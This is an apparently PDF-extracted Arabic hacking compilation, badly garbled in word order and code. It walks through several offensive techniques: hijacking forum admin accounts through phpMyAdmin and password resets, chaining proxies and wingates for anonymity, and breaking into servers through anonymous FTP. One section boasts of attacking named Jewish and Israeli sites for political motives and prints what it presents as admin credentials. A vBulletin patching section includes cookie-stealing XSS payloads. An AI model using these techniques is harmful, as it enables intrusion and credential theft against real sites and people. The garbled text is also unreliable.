بیفتح لك صفحة قواعد البیانات انزل و بعد ما تضغط على ايقونة قاعدة البیانات الشرح ثم اكمل phpMyAdmin ى اخر الصفحه واضغط علىال

اسفلھا ا فياالن اتبع الصور مشروح علیھا اال بعضھا سیتم التعلیق علیھ

233

ستخرج لك قائمه على الیسار اختر منھا

اللي بعدھا تفتح لك صفحه اختر من القائمه اللي فوق الموجود في الصوره تحت

الصوره في االسفل اتبع شرحھا باالرقام

:: الشرح بريده لتحرير العضو اي الدخول لتغییر اسمه او1- حذف العضو2- رقم العضو3- اللي ھو رقم مجموعة :: 6:: رقم رقم مجموعة العضو والرقم الموجود ھو4-

المشرف العام محذوف اتبع وھذا الرقم يھمنا اذا كان اسم administrator الـ الشرح وتعرف االھمیه

234

احد المنتدى يبي يغیر االسم عشان العام طبعا اذا اخترقاسم المشرف5- االسم كذا الرقم يھمنا بمعرفة المشرف العام مھما تغیر

باسورد المشرف العام مشفر6- العام بريد المشرف7-

ـــــــــــــاو انت تريد تعدل 6انت اذا لقیت اسم المشرف العام سواء عن طريق الرقم

الموجود في اي تحرير االسم ثم بتفتح لك صفحه واتبع 1علیه اضغط على رقم الصوره تحت

العام اللي خل اسم المشرفبعد ما تحفظ التعديالت اذھب الى المنتدى واد اخترته واكتب اي باسورد طبعا يبي يقول لك خطاء اطلب استعادة كلمة المرور

ثم اكتب بريدك وانتظر الرساله ثم ادخل وشف شغلك ــــــــــ

235

تحت اما في حالة كان اسم المشرف العام محذوف اتبع الصوره

ثم تبي تفتح لك الصفحه ھذي

المرور طبعا نفس الطريقه بعد ما تحفظ التعديالت استرجع كلمة

ــــــــــــــــــــــــــــــــــــــــللمواقع العاديه فیه شرح في االسفل لطريقة الدخول الشرح اللي فوق ھذا

لیوكس الى قاعدة البیانات بموقع

بعد تسجیل الدخول للموقع اتبع الصوره في االسفل

236

الصوره بعدھا بتفتح لك صفحه ثانیه وايضا اختر من القائمه الموجود في

بعدھا بتفتح صفحه ثانیه وايضا اتبع الصوره

بیفتح لك مربع اختر نفس اللي بالصوره تحت

237

تبي بعدھا بأعلى المربع موجود الخیارات اللي في الصوره تحت اختر اللي وطبق نفس الشرح الموجود فوق في تعديل اسم المشرف العام او اضافة اسم

جديد

238

!!كیف تبقى مجهول الهویة ؟


الجزء األول

الموضوع سوف أقوم بتعلیمكم في ھذا ماھو؟

Wingate- Sock Host -Proxy (-يادة من صعوبة الكشف عن ھويتك في النتاستخدامھم للز وكیفیة-)

تساعدك في التخفي مع أدوات بسیطة أيضا

++++++++++++++++++++++++++++++++++

Introduction to Proxy Server =(خادم الوكیل:أي proxy server الدخول إلى)=

(proxy server ھو خادم) خادم الوكیل server لیقوم أحدا ما بتنزيله علىأو أي جھاز على اإلنترنت مايفعله أوال ھو االتصال امه لإلتصال مع المواقعنظ

proxy server بخادم الوكیل لكنه غیر إجباري لكن غالبا مايستخدم في الشبكات

:LANمثلLocal Area Network

اتصاالتك جمیع proxy server شبكة إنترنت محلیة عند اتصالك باإلنترنت خاللھذا البروكسي المستخدم أوال وقبل كل شيء ثم تتوزع سوف تذھب إلى

األجھزة التي تريد أن تعمل إتصال بھا كمثال علىوتريد أن تتصفح proxy server استخدام إذا أردت أن تتصل باإلنترنت من خالل

وتفتح موقعا كھذا/tk.hackergurus://http

بطلب الصفحة proxy server ثم يقوم proxy server أوال بالطلب من ھذا علیك/tk.hackergurus://http

الموقع ومن ثم تحمیلھا وتخزينھا في حسابھا بعد ذلك server الخادم إلى ...تستعرضھا:الصفحة أي سوف تمدك وتعطیك

239

باإلتصال المباشر بسیط في وقت أطول مقارنة bit ھذه العملیة تأخذألیست الذي يكلفك فقط بطلب الصفحة من خادم الموقع ومن ثم جاري) العادي(

تحمیلھا بسھولة واستعراضھاباإلنترنت بطيء لكن مع استعمالك للبروكسي سیرفر سوف يصبح اتصالك

تستعرضھا تقوم بتحمیلھا أيمقارنة مع االتصال المباشر وذلك ألن كل صفحة وھذا يثقل عملیة التصفح proxey server تذھب إلى خادم البروكسي أي

بعض األحیان قل كیف lucky وھناك حالة وحدة وقد تصبحنفس البروكسي واستعرض نفس الصفحات وانت إذا الشخص قام باستخدام

الي واستعرضت الصفحة استخدمت البروكسي الي استخدمه ھذا الشخص !استعرضھا راح يصبح البروكسي سريع لیه؟

قام باستخدام البروكسي وعرض الصفحات الصفحة ألن الشخص األول اليلديك نفس البروكسي وحبیت فما بالك إذا كان proxy server حملت إلى

جاھزة download تسعرض نفس الصفحة سوف يكون سريع ألن الصفحة .. #فھمت

ھم مثال اذا الواحد استعرض صفحة ببروكسي من قبلوأيضا ياأخواني الوقت مأيام وانت استخدمت نفس البروكسي واسعرضت نفس الصفحة غیر اذا 10

يقدم المواقع الحديثة على القديمة proxy server عرضھا في يومین ألن أو Refresh البروكسیات كل ماعلیك عمل علشان كذا أحیانا تالحظ تأخر في

Reload

Proxy ServerWhy use a =(لماذا نستمعل البروكسي سیرفر؟)=

يسئلوني مادام خادم البروكسي يقوم بعملیة وانا راح اجاوب على األخوان الي !!!مالدافع الستخدامه ؟ إبطاء التحمیل والتقلیل من السرعة إذا

ھو أن مزودين خدمة اإلنترنت:الجوابISP

Internet Service Provider يد وبوضعك في قفص وھو عدم السماح الستعراض وتحمیليقومون بالتحد

الصفحات إال التي تم الموافقة علیھا من قبل مزود الخدمة ويقومون بتقلیل الخاص بھم لتوفیر السرعة في استخدام Traffic للحفاظ على المواقع

البروكسي لمشتركینھمي موقع مھما سوف يجعل لك الحرية الكاملة في استعراض أ proxy server أما

آخر للبروكسي وھو للحفاظ أو للزيادة من بقائك مجھوال أثناء قیامك كان وسببعملیات االتصال يعني لو استخدمت بروكسي راح يصعب على بأي عملیة من

240

ip الذي اتصل الموقع من خالله وھو ip يأخذ خادم الموقع اصطیادك وذلك ألنه الموقع البروكسي وھو الذي يتصل مع خادم

وأيضا تستطیع الزيادة من صعوبة محاولة االسقاط بك وذلك باستخدام عدةبروكسیات ذات منافذ مختلفة لكن أعلم أن ھذا سوف يقوم بتقلیل من سرعة

حاول ان تستخدم االتصال لذلكproxy و port قريبین إلى منطقتك التي تعیش فیھا حتى يكون proxy server

ة وأحیانا تفوق سرعة البروكسي سرعة قريب وبذلك سوف تزداد السرع (.. !!بمزود الخدمة مارأيك بروكسي الخاص

مايكروسوفت مھما وضع تحذير للجمیع إياكم ياأخوان أن تنخدعوا ببروكسیات لھا من إعالن كأن يقول استخدم

com .microsoft.cach80بمنفذ وطبعا انت ماتصدق تالقي بروكسي بھذي الممیزات

حسريع التصف1- جمیع المواقع يفتح2- التحمیل عالي جدا وقوي3-

ھل تعرف لماذا ؟ المستخدمین حول العالم ھذا البروكسي سیرفر وھذا خطیر جدا ألن أكثر

سوف يقوم بمعرفة جمیع تحركاتك وحفظھا في الن ھذا البروكسي سیرفر Logs ملفات

Introduction to Wingate

ate Wing=(الدخول أو اإلدخال إلى)= معناه الحقیقي ؟ كثیرا مانسمع عنه لكن ھل نعرف

؟ WinGate ماھووھو خادم بروكسي ذو حاجز أي يفوق البروكسي proxy server firewall ھو

بالحماية والتي ناري يحتوي على حزمة كبیرة وضخمة من البرامج المختصة (مجھول الھوية Anonymously )تبقیك

بفرد واحد أو بعدة من اتصاالت اإلنترنت بشركة كةالتي تقوم بالسماح بالمشار كمبیوتر بالكامل :تشمل تقريبا لعدة أنواع WinGate يكون مشارك بواسطة اتصال اإلنترنت

-------------------------------------------------------------------------------------- or , atellite connections, cable modem, xDSL, ISDN, dial up modem

circuits1even dedicated T --------------------------------------------------------------------------------------

241

wingate متشابه مع البروكسي سیرفر حیث يعمل اتصاالت مع كومبیوتر لسیرفر آخر

Telnet .في الحقیقة ھو اتصال 23 ,خالل المنفذthe wingate اإلنترنت أو االتصال سوف يجعل أي شخص على الشبكة دخول

Aminstrator وعدم كفاءة wingate بصورة سیئة وفق بین. به لمواقع أخرى والذي تجعل األشخاص على اإلنترنت wingate وھنالك العديد من)المدير)

الشبكةrk Local Netwo)بدال من تحديد المدخل للناس من, لإلتصال ببعضھم (المحلیة

إلى سوء استغالل Mirc - ICQ في ipspoof وفتح الطريق ألي شیئ من . الحجموعادة تنتھي مدتھا في بضعة open wingates قد يطلق علیه wingate مثال

DIScover وھذا راح يكون) المدير Admin )شھور حتى يقوم باكتشافه أيام أووي من سوء استخدام أو أعضاء أو يتلقى شكا ياأخواني يعني مكشوف

!!! غامضینالقدرة على وضع مستخدمین متعددين في الفائدة الوحیدة للمديرين ھي

الفوائد نفس االتصال لكن ياأخوان المشاكل تفوقخاص به علیه الحذر بشدة ومعرفة ماھو WinGate إذا أي شخص قام بتنزيل

WinGate متعددة أكثرويتأكد من أنه موفق بشكل آمن وھنالك أخرى يفعل SyGate أمانا مثل برامج

تحذف WinGate Serverالخاصة بالـ) سجالت Logs )في معظم الحاالت ملفات خاصة بالكبارأي اليوجد حاجة أوs 'ISP ساعة لألعمال وأيضا للـ48عادة بعد

wingate موارد لتدوين كل شيء يصادف خادم

How do I find Wingates =(؟WinGate الحصول علىيمكنني كیف)=

بإمكانك تاخذ عنوان . أفضل طريقة للحصول على ھذا الشيء ھو كلمة بالفمwingate تستخدم الشيء الثاني أقترح علیك. من أصدقائك إذا كان أحد عنده

برامجWinGate Scanner

google ھنالك العديد منھا بالنت ابحث فقط في/com.google.www://http

ومن ثم البدء بالبحث hostname او ip كل ماعلیك فعله ھو وضع مدىالشرق األوسط وأفريقیا وأخیرا مثال اقترح علیك البحث في بالد العالم الثالث أو

:وھي كلھم يتشابھون ولديھم صفات شائعةhome )@ (شبكة

242

مفتوح قلیل على wingate صورة رديئة وعادة ھناكوالذي وفق ب wingates توفرNetWork حقھم ...

المحاولة والخطأ: أفضل طريقة ھي Unix خاللTrial and Error 23من المنفذ wingate اتصل بالتلنت في

والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك واذا لقیت اترك فراغ االسم Anonymously أو) الضیف Guest )میزة تستخدمتجربة اسمك وكلمة سرك او

Introduction to Socks Host

Socks Host =(أو اإلدخال إلى الدخول)=Socks Host تقريبا مثل WinGate السوكس يتصل من لكن االختالف وھو ان المتصفح وبإمكانك عمل اإلعدادات علیھا وھي تتوفر في1080خالل المنفذ

capeexplorer and nets Socks Host وبإمكانك إضافة

الخاص بك ip وتقوم بحمايتك وبإخفاء Mirc تستخدم كثیرا في الطريقة وھذه FireWallوتعمل كـ

********************** وھذه برامج مساعدة على بقائك مجھول الھوية

********************** (مجھول الھوية(الذي يجعلك تتصفح متخفیا GhostSurf برنامج

][=Stealther=][

%100ال لن تصبح مجھو لكن أعلم ياأخي الكريم أن وبكل مافعلت

243

!!كیف تبقى مجهول الهویة ؟


الجزء الثاني

...عملي ولیس كالسابق ألحین الموضوع ھذا سوف يكون فیه تطبیق

على اإلنترنت وقت لبقاء حريتك وسريتك Chaining Proxies ھذه الفقرات عنھذا قرأت عنأطول أثناء اتصالك لكن التظن ان ھذا الموضوع كافي فكلما

الجانب سوف تصبح الشخص المجھول Telnet مجھوال على لتصبح Chaining wingates وأيضا سوف نتكلم عن

(-------------------------------------------

او قد Domain الخاص به او ip إلخفاء proxy المعروف أن أغلبكم يستخدم من . لمغلقة وأيضا لحماية ھويتهالبروكسي لكي يجتاز المواقع ا يستخدم

Ip ومن األفضل ان تعرف ماذا ھو Proxy تستخدم لكن علیك ان تتعلم كیفAddress و Domain أوال ,,, Proxy تقرأ ھذا الموضوع علي اوال ان اقوم بإرشادك كیف تحصل على قبل أن

:المواقع مع تحديثھا من ھذهhtm.list_anon/org.multiproxy.www://http

/proxy/com.rosinstrument.tools://http وھو يقوم بإرسال Groupلكم وأنصحكم إنكم تسجلون بـ أو ھنالك طريقة أفضل مختلفة دا وبمنافذبروكسیات جديدة ج

:com.yahoogroups)@(Y_X_O_R_Pالجروب طريقة التسجیل

إلى حسابك وأرسل للجروب بھذه الطريقة قم بالدخول في خانة اإلرسال إلى اكتب

com.yahoogroups)@(subscriber-Y_X_O_R_P Replay رغة إلیھم بعد ذلك سوف تتلقى رد مباشرة قم بعملرسالة فا وأرسل

بالجروب سجلت اآلن مبروك لقد-------------------------------------------

244

========================= لن أقوم بمساعدتك في كل عمل تقوم به تستطیع التأكد من أن أن

: إلى البروكسي يعمل بالذھاب/net.privacy.www://http أو/com.proxytester.www://http

ھذا بالنسبة للموقع األول أما الموقع !!! أم ال تغیر Ip وقد تعرف ھل عنوان .. ك مستوياتھاواعطائ الثاني فھو خاص لكشف البروكسیات

=========================

*************************************

&&&&&&&&&&&&&& proxy server

&&&&&&&&&&&&&& ) : etc,IRC Chat,WebSite(يقوم باالتصال بین Proxy خادم ھو

بإرسال طلبات لكي يستقل او يستعرض المستخدم ھذه البروكسیات تقومعلى اإلنترنت لكي يطلب ھذا إلنترنت البروكسي يرسل طلبكموقعا على ا

Proxy في الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وھذا سوف يخزنServer

...كما قلنا في الموضوع السابق البروكسي بالموقع ھذي توضح كیف تتصل عن طريق

] Web Pages[>>>>>]Proxy[>>>>>]User[

---------------- y Chaining Prox

---------------- عدة بروكسیات وھذي طريقة فعالة جدا لكي تصبح مجھوال الھوية حیث معناھا

واحد من بروكسي لكي تعرض موقع يمكنك ان تتصل بأكثر /مثال

Desti[>>>]4Proxy[>>>]3Proxy[>>>]2Proxy[>>>]1Proxy[>>>]User[

245

] nation ه االتصال بالبروكسي االول فالثانييوضح ھذا المثال ان المستخدم اوال علی

فالثالث والرابع وأخیرا الھدف مما يسبب بطأ في االتصالetc, ftp server, Unix server, web page= Destination لیحفظ سريته اثناء مطلب ضروري لكي يستخدمه أي ھكر Proxy chaining إذا

or http , ftp, telnetمثل server الدخول إلى أيaining Chلكن حاول بقدر % 100مھمة كما أقول لن تصبح مجھوال ھي

مثل السمكة لكن البروكسیات المستطاع على ان ال تمسك ويطادونكراح ftpموقع بالـ المتعددة صعب ان يكشفھا احدا لكن مثال حاولت تدخل على

من يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلبAdminstrator ملفاتLogs لكي يعرف المصدر والمصدر ايضا راح يكون proxy

ھھھھھھھھه يعني على ھذا المنوال إلى ان يصل الى المستخدم لذلك عملیةChaining Proxy عملیة مفیدة جدا ويصعب احدھم االمساك بك

الضغط على البروكسي لكي يصل الى تنحذف في اوقات بعد Logs لكن ملفاتالخادم الي يحتوي میل الملفات على البروكسيالحد المسموح به من تح

... متجددة Logs على البروكسیات لذلك سوف تصبح ملفات

---------------- HTTP Chaining

---------------- HTTP chaining ھي نفس طريقة Proxy ويمكنك عملھا من مستعرضك وفي

Address خانة :مثالcom.google.www://http-_-/com.magusnet.proxy://http

!!! لم ترونھا مسبقا صحیح) -_- (حركة جمیلة وجديدة :مثل Chaining وأيضا يمكننا استخدام

-_-/com.2server.proxy://http-_-/com.1server.proxy://httpcom.destination.www://http

يمكننا وضع عناوين بروكسیات بمنافذھا او

com.google.www://http/com.anonymizer.efre.anon://http

246

مثال آخر

بین المواقع(/) كإضافة عالمة

com.yahoo.www://http/:803proxy/:802proxy://http/1proxy://http = proxy رقمي يكون أفضل لكاستبدله ببروكسي .....

---------------- Browser Chaining

---------------- حديثي فقط عن وھو استخدام البروكسي من متصفحك وانا سوف يكون

Internet Explorer ألنه األكثر استخداما---- بروكسي ألحین مثال عندنا

213.234.124.23:80 213.234.124.23:العنوان 80:المنفذ

أي مزد خدمة اإلنترنت ISPنحطھا بدال البروكسي الخاص بالـ ألحین كیف نروح عند

Tools أدوات Internet Options خیارات إنترنت Connections بعدين اتصاالت

االتصال الي تدخل في االنترنت بعدين تختار Settings إعدادات راح تجد

(Address العنوان) (Port المنفذ)

الهونضعه بد وبعد كذا اضغط موافق و 80: المنفذ213.234.124.23:العنوان

Chaining Proixes والحین نبغى نستخدم االستعراض المتعدد

/كذا بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل: Port143.134.54.67 121.172.148.23:80 213.234.124.23:80: Address 80

247

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$

&&&&&&&&&&&&&& Wingates

&&&&&&&&&&&&&& Wingate ھو proxy server الذي ينزل في جھازه او جھازھا لیسمح بالفرد او

(( العادي Telnet منفذ ((23مقاعدھم بالمنفذ خالل بعدة أفراد لیأخذونلكي يتصلون به مباشرة e onlinمتصل يسمحون ألي شخص Wingates بعض

لیس من القانون وھنالك او في وقت قصیر التتعدى االيام لكن اعلم ان ھذاحسب على جھازه ھذا على wingate تمنع من استخدام Adminخصائص للـ

!!!! المدير ھل يفھم في ھذا المجال أم ال 32أجھزة تتصل من خاللھا على المنفذ أجھزة أو اسماء ip وھي عبارة عن

أو يمكنك من عمل بحث ببرامج Telnet بأداةWinScan

Wingate

Download

------------------------------- Chaining Wingates Using Telnet

------------------------------- كالسابق واألدوات التي نحتاجھا Wingate نستخدم عدة ألحین راحألظن أن األجھزة سوف تخلو من أھم ھذين Telnet وأداة DoS ھي فقط

..... األداتین إال نادرا لكن المنفذ لیس مھما لكني سوف 23تتصل عن طريق المنفذ wingate جمیع

عن طريق المنافذ Telnet كیف يتم االتصال بالـتتعلموا فقط أضیفھا لكم لكي

امكننا إحضاره وھذا عنوان جھاز

23 ومنفذه 61.133.119.130ھو

248

:مثل Telnet ويتم االتصال به عن طريق 23 61.133.119.130telnet >WINDOWS\:C

فمسافة زائدة او ناقصة قد تعثر خطوتك الحظ وجود المسافات

لوين جیت مثل ھذابعد كذا سوف تتصل با 23 203.207.173.166> Wingate

مرة ولكن مع تغییر العنوان يعني كذا بعدين تقدر تكرر العملیة اكثر من

.45 23.99.17213> Wingate وأيضا اتصل مرة أخرى

.7 23.212.6510> Wingate اتصل بالموقع wingate بعد ماتتصل بأكثر من ألحین

org.arbornet>WinGate

اذا الطريقة وبخطوة سريعة تبدو كذلك 23 61.133.119.130telnet > Windows\:C 23 203.207.173.166>Wingate 23 135.245.18.167>Wingate

org .arbornet.net-m>Wingate Connected ...org.Connecting to host arbornet

249

طرق حمايه المنتدى

HaCkErS:للكاتب

ورحمه اهللا حبیت اقدم موضوع سريع حول ترقیع الثغرات الجديده لسالم علیكم منتديات فیبلیوتن وحمايه

ومجلد modcp على مجلد ) htaccess ( .اول شيء الزم تضع جدار نارى

admincp ومجلد includes

الوصول الى لوحه التحكم حتى يعصب modcp و admincp يفضل تغیر اسم

php. configافتح ملف includes لموجود داخل مجلدا

قم بتعديل اسماء المجلدات '; admincp'= admincpdir $ )بتغیر اسم المجلد م(

'; modcp'= modcpdir $ )المجلد م بتغیر اسم(

تروح لم لوحة تحكم الموقع السي بنل واضغط على ايقونهpassword protect directories

المنتدى د مجلدبعدين يطلع لك مجلدات موقعك حد اضغط على مجلد المنتدى

حمايته وھو مجلد المنتدى ستفتح لك صفحه اخرى اختر المجلد الى تبي الذي غیرت اسمه اضغط علیه بعدين تفتح صفحة جديدة

save عالمة صح في مربع القفل المغلق ومن ثم اضغط على حط back على زر ارجع لنفس الصفحة بالضغط

سم مستخدم وباسورد لحماية مجلد االدمین الجديداالن نقوم بوضع ا افعل ذالك واحفظ عملك

250

incldes, modcp , admincpوكرر العملیه مع المجلد القديم الفارغ

واجب تأكد وال ثغره الھتمل ھي تلقائي مغلقه خاصیه الھتمل الن االحتیاط تسمح الكواد ھتمل في التواقیع

اخر عشر مواضیع وابحث عن ھالكودين جلدثغره اخر عشر مواضیع نزل م

الخبیثینfsel$

ftitle$

وخالص كذا رقعت تمام احذفھم من الملف

الحل احذف Path Disclosure وھي ثغره من نوعphp . faqثغرة ملف التعلیمات

من وجھه نظري ماله داعيphp . faqملف

php . faqواذا ملزم تبي االسئلة الشائعه ادخل

الكود ھذا وابحث عنinitialize some template bits //

''; = faqbits $ ''; = faqlinks $

حط تحته مباشرة ھذا الكود

initialize some template bits // ''; = faqbits $ ''; = faqlinks $

وھي خاصه لسرقة CrossSite Scripting نوع معروفه منphp. editpost ثغره بالكوكیز المسروق الكوكیز يقدر المخترق يدخل المنتدى

251

وردودھم طريقتي بالترقیع عد السماح باالعضاء بتعديل مواضیعھم

---------------------------------- vb 3 اكتشاف ثغرة خطیرة فى منتديات تم

ثغرة الرسائل الخاصة

3.0.53.0.6,3.0.7 ,3.0.4, 3.03االصدارت المصابة ھى

:االتي للتأكد من وجود الثغرة اتبعابة رسالة جديدة و ضع اسم المستلم و العنوان و في المضمون ضع قم بكت :التالي الكود

<Script>javascript:alert(document.cookie);</Script>

وضعھا اخونا للعندلیب اهللا يجزاه خیر- : الترقیع طريقة php. privateافتح ملف

: ابحث عن االسطر التالیه

// trim the text fields $pm['title'] = trim($pm['title']); $pm['message'] = trim($pm['message']);

: استبدلھا باألتي

// trim the text fields $pm['title'] = trim(xss_clean($pm['title'])); $pm['recipients'] = trim(xss_clean($pm['recipients'])); $pm['message'] = trim($pm['message']);

252

برفعه احفظ الملف وقم

----------------------------------

SQL Injection وھي ثغره من نوعphp . authorizeثغرة ملفاسمع فیھا الظاھر حقت paypal وبطاقة ھو ملف مال امه داعى خاص لشراء

شراء من االنترنت php . authorizeترقیعھا حذف ملف

----------------------------------

اصحاب المنتديات جديدة جننتphp . newreplyثغره ملف

ذه ھي الثغرة اللي جننت اكبر منتديات الھكر العربیةالظاھر ھ

:االصدارت المصابة ھي

Gamma.03VBulletin VBulletin 7 beta 3.0VBulletin VBulletin 6 beta 3.0VBulletin VBulletin 5 beta 3.0VBulletin VBulletin 4 beta 3.0VBulletin VBulletin 3 beta 3.0VBulletin VBulletin 2 beta 3.0VBulletin VBulletin

3.0.1VBulletin VBulletin litySite Scripting Vulnerabi- Crossو ھي

اصدار المنتدى و و الحل السلمي لھا تجديدphp . newreply...و الثغرة ھي .. تغییره

php and .both newreply, While a user is previewing the post

panel does -but Edit', Preview'php do sanitize the input in .newthread

253

de can be injected through The result is that malicious HTML co. notA page as below can lead a visitor to a Preview page that . this hole

:contains malicious code that performs a cross site scripting attack html نحفظه على صفحه xss ھذا كود و " vbform="name" php.newreply/host://http="form action< '>hidden:visibility'=style" post="method " HTML_WYSIWYG="input name< >"/>)"cookie.document(alert:_script_java="IMG src<="value >"/postreply="value" do="input name< >" /123456="value" t="input name< >" /123456="value" p="input name< >"/preview="name" button="asscl" submit="input type< >form/< >script< ;()click.preview.all.document

>script/<

.............................. على الجمیع سرعة الترقیة االصدارت االحدث فھو الحل االمن لمثل مالحظة

الثغرات ھذي

----------------------------------

php . initثغره ملف

شرح الترقیع اخوانا العندلیب اهللا يجزاك خیر بعدينphp . initحمل ملف

إبحث عن األسطر التالیه ("query>-site_DB$= datastoretemp $

254

data, SELECT title datastore. "PREFIX _TABLE" . FROM

)') . "specialtemplates, $"', '("implode" . '(WHERE title IN ;") ; )specialtemplates, $specials$(unset : باستبداله بما يلى قم ))specialtemplates$(array_is(!if ;exit ;()ayarr= specialtemplate $ )arryval> $=arrykey $specialtemplates AS $(foreach { ;"])arrykey$["specialtemplates$(addslashes[] = specialtemplate$ } ("query>-site_DB$= datastoretemp $

data, SELECT title datastore. "PREFIX _TABLE" . FROM

)') . "ecialtemplatesp, $"', '("implode" . '(WHERE title IN ;")

; )specialtemplate, $specialtemplates, $specials$(unset

----------------------------------

وماقبلھا وھذه الثغرة في 3.0.7المنتديات للنسخة تم اكتشاف ثغرة امنیة في خاصیة البحث

الشركة تحديث أمني يحل مشكلة في نظام البحث قبل يومین طرحت واالصدارات السابقه3.0.7بالنسخة وقد صرحت الشركة بأن ھذا الباتش خاص

لقراءة المزيد من التفاصیل

255

133459=t?php.showthread/forum/com.vbulletin.www://http

والموافقه على االستبدال includes الملف الى المجلد يرفع

الباتش ھنا

zip.search_functions/soft/cc.hala.azizsoft://http

بعض طرقي في الحمايه واعترف انھا لیست حمايه كامله الى عنده ھذي الجمیع اضافات يضیف واهللا يوفق

257

anonymous Access

Fighter:للكاتب

دي طريقة بسیطة وسھلة جدا ومش محتاجة أية تعقیدات بس حبیت أن أكتب ! ) .. في بعض األحیان ( ا علشان أوضح مدىسھوله اإلختراق عنھ

...للتطبیق علیھا) مواقع يھودية(وكمان أنا حطیت شوية أمثلة

، وطبعا ftp في ال anonymous Accessالمھم، طبعا كلكم سمعتم عن ال ) حسبما ھو مكتوب (قرأتم العشرات من المواضیع عن كیفیة إستغاللھا و إزاى

كله كالم إنتھى من passwd/etc تحصل على البسوردبكل بساطة من تقدر أن أوموقع يسمح لك بالحصول على ملف hostزمان وصعب جداالعثور على

...الباسوردبھذه البساطة

بس anonymous accessالطريقة السھلة اللي عاوزأشرحھا ھي تطوير ل ندوز مش على الیونكس ھذه المرة إلختراق بعض المواقع والتي تعمل على الوي

...بس زي الطريقة القديمةأنا إستخدمتھا في إختراق عدة مواقع اإلسبوع الي فات ، كرد على المذابح

التي وقعت أخیرا في فلسطین ، وبرده كرد على إختراق موقع طريق ....اإلسالم

، وسكانر جید ) ws ftpأنا أرشح برنامج (ftpكل الي إنت محتاجه برنامج لل

nmap، nesus ، satanولو كان عندك لینوكس يبقى ( shadow أو retinaزي المھم تعال نجرب على الموقع دا ) whiskerأو

com.jewishexponent://http ودا موقع جريده يھوديه كبیره تصدر في عندھم ثغرة ، إسمھا .. يا اهللا .... نعمل شوية سكان علیھم... فیالدلفیا، بأمريكا

s ftp accessanonymou طیب نستفاد منھا إزاي والسرفر بتاعھم ويندوز، ؟ 2000

بسیطه نعمل كونكت علیھم برنامج اإلف تي بي بتاعنا ، !!أو كي عظیم إحنا اآلن في السرفر بتاعھم بنتفرج علىملفاتھم

دي كارثة كبیره إن ( ، يعني ممكن نتفرج علیھا Aspدا كمان عندھم فیالت لع علیھا أحد بخالف األدمین ، علشان بكل بساطة ھذه يطAspملفات ال

الملفات تحتوي على معلومات حساسة عن كل شىء مكن أن تخیله ، وفي ) ..أغلب األحیان الیوزر نیم والباسورد بتاع األدمین

258

، jeadmin/طیب فین نالقي الباسورد ؟؟ روح علي الديريكتوري اللي إسمه ، نزله عندك في جھازك أو إفتحه أون الين asp.adminLoginوبعدين ھذا الملف

: ،ھتالقي السطر ده file previewعن طريق if processme" = Y "then

Request= uid ")uid(" Request= pwd ")pwd("

if uid" = jejanette "and pwd" = rLlsd234jeLU "then Session")admin" = ("true"

مین والباسورد بتاعه في خط واضح مش محتاج عندك اآلن الوجین نیم بتاع األد، وطبعا لو إنت بحثت في الملفات ھناك ھتالقي البیانات و !!! تعمل كراك لیه

....الباسورد بتاع قواعدالبیانات عندھم

وده بیعمل ويب il.co.berale. wwwونفس الحكاية برضه في ھذا الموقع ، il.co.no-oh ، il.ac.ruppinھوستینج ، ھتالقي ھناك مواقع كثیره نده زي

il.co.genie ، il.org.meretz ومواقع كتیر تانیة بس أناماكانش عندي وقعت ، anonymous ftp accessالمھم األدمین ھناك قفل ال .. أشیك علیھم كلھم

!! بس برضه ھانججیب الباسوورد

نعمل طیب تعال212.179.35.99الھوست الرئیسي الرئیسي اآلي بي بتاعه .. وھو ھوست فرعي تابع لنفس الشركة 212.179.35.100كونكت على

، ونعد نلعب بالفايالت بتاعتھم لغاية ما anonymousھناك ممكن ندخل بال ...O|tinplH=Passwordنجیب الباسوورد الي ھو

نرجع تاني لھوست الرئیسي ونعمل كونكت بس المرة دي بإستخدام ال نیت والباسورد الي معاناه administratorو اللوجین نیم 139بايوز بورت

...أتمنى ان اكون عرفت ان ابسط الموضوع والشرح

وبالھناء والشفاء

259

FTPختراق عن طريق الاال

Turbo:للكاتب FTP احب ان اوضح فقط ان معظم المرات التي اخترقت بھا عن طريق ال

ب يوزر نیك و باس و ھذا يحتاج يتطل FTP ذلك الن الدخول ب كانتبدون فائدة و زائر و ال يحق لك سحب او ارسال فیالت الي كراكر و ال ان تدخل كا و كأنك يا ابو زيد ما غازيت

كل المھتمین بالموضوع المشاركة للتعلم و نشر الفائدة فارجو من

اإلقتحام يجب ان يكون لدى الضحیة البورت أوال و لنجاح21

FTP خاص بالمفتوح و ھو البورت الو لتأكد من أن البورت مفتوح علیك ان تستعمل برامج السكان و ھي كثیرة و

اھمھا منSuperscanne

ھي بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانیة و إضغط على

Start ثم

Run ثم اكتب

n-ftp في الدوس مكتوب علیھا سوف تطلع لك نافدة

>FTP ل شيء تمامؤوكي لحد ھنا ك

اكتب و بعدينOpen

ثم إضغط على إدخالEnter

التالیة سوف تتحصل عب النتیجة>FTP

To

260

أكتب بجانبTo

إدخال رقم اإلبي للضحیة ثم إضغط على و اآلن خد بالك معي

خطوة إدا تحصلت على ھدا الرد فقد تخطیت

com.assassin.Connected to www )..04Version ( Service Microsoft FTP1 websrv220

و اآلن أكتب الكتابة التالیةquote user ftp>ftp

تحصلت على ھدا الرد فقد تخطیت خطوة إداas ) mail name-e(send identify , Anonymous acces allowed331

.password و اآلن أكتب الكتابة التالیة

root~quote cwd >ftp طیت خطوةإدا تحصلت على ھدا الرد فقد تخ

Please login with USER and PASS530 ثم أكتب الكتابة التالیة

quote pass ftp>ftp الرد فقد تخطیت خطوة إدا تحصلت على ھدا و نجحت في اإلقتحام

.Anonymous user logged in230

مبروك أنت اآلن في جھاز الضحیة ما علیك اآلن اال ان تقوم بإستعمال

اوامر الفتیبيوقعت فیھا و طبعا لن امر علیھا مرور الكرام لكي ال تقعو في المشكلة اليو

اردتم ان ھي نجاح اإلقتحام من دون ما أعرف و ال فكرة على اوامر الفتیبي و إدا دقیقة و انا مجمد اإليدي و الضحیة عالقة من دون أن20تضحكو بقالیأكثر من

أعمل أي شيء و لھدا اإلقتحام ي تطبقوھا مباشرةا بعد نجاحقمت بحتضیر االوامر لك

Pwd لكي تعر ما يحتويه الھارد ديسك

Cd

261

مثال إلقتحام مجلدCd black

في ھدا المثال قمت بإقتحام مجلد المسمى بالكLs

